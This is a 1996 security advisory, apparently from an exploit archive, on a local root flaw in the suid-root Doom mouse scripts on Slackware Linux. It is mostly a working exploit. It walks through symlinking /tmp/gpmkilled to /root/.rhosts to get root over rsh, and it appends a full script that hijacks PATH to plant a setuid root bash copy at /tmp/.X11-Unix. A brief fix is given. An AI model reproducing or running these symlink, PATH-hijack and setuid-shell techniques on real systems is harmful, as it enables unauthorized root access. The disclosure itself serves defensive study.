Doom calls insecure shell scripts as root, leading to easy root compromise.
Linux, including Slackware 3.0. Possibly other distributions.
14 December 1996
If anyone runs suid root GAMES on a system they want secure, they DESERVE to be hacked! I've appended the obvious exploit to the end of this.
From: Bo (firstname.lastname@example.org)
Date: Sat, 14 Dec 1996 23:59:52 +0100
A word to the moderator:
Hi Aleph. It seems you were right in that if you look hard enough, the
root bugs will come your way. This time I have checked Underground
before I submitted this, and the linux bugs collection do not mention
this bug, so maybe I actually found a new one? It's hard to believe
since it's such a lamer , very much like the autoreply(1) bug. Let me
know if I am onto something here, okay?
Probably Linux specific. Slackware 3.0 (installs Linux 1.2.13) which
have gpm utility and/or the Doom package installed are vulnerable.
Other distributions might be too.
Local users can acquire root status.
The problem is the killmouse/startmouse command that is part of Doom
package on Linux systems. It is actually a C-wrapper that runs two
scripts (killmouse.sh/startmouse.sh). It runs suid root.
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
I would try to describe the problem but I can't stop laughing.
This can be exploited in a few similar ways. Here's just one. Let's
assume the gpm utility is not running. We can't start it up ourselves
as gpm is only to be run by root. So we'll use startmouse to fire it up:
$ touch /tmp/gpmkilled
ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms
Fine, it's running. Now we'll use killmouse to kill the process, but
first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:
$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
1407 ? S 0:00 gpm t ms
$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts
$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
Bingo. On some systems gpm might not be started in /etc/rc.d/rc.local
so the startmouse script will fail. But gpm might be running already.
If neither of these conditions are met, note that startmouse.sh creates
/tmp/gpmscript and runs it in a shell. There's a window of time between
creating the script and executing it, so we have a nice race condition
here; it can be replaced with anything you like prior to execution.
Remove setuid bits of killmouse/startmouse. Better yet - nuke them.
While your at it, nuke Doom too - it's a stupid game anyway :-)
"Heisenberg may have been here".
And here is the obvious exploit, written by " Sorcery / mj13":
# Doom exploit by Sorcery / mj13
# Use it only on your system!
# doomroot.sh (mode 755 =)
# File to remove if it fails: ~/gpm,/tmp/gpmkilled,/tmp/gpmscript,/tmp/.X11-Unix
# Guy to great if it worx: email@example.com (yeah, that's me ! :) )
# FIX: rm -rf /usr/games/doom =)
cp /bin/bash /tmp/.X11-Unix
cat << EOF >> ~/gpm
/bin/chown root.root /tmp/.X11-Unix
/bin/chmod 4755 /tmp/.X11-Unix
chmod 755 ~/gpm
set oldpath = ( $path )
set path = ~/
/usr/games/doom/startmouse >& /dev/null
echo "\n This should happen now! =)"
echo "/tmp/.X11-Unix is perhaps your paradise, guy!"
echo " Found and Exploited by Sorcery\n"
/usr/bin/sleep 2 # let's wait for gpm to finish his work...
set path = ( $oldpath )
# End of doom exploit
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: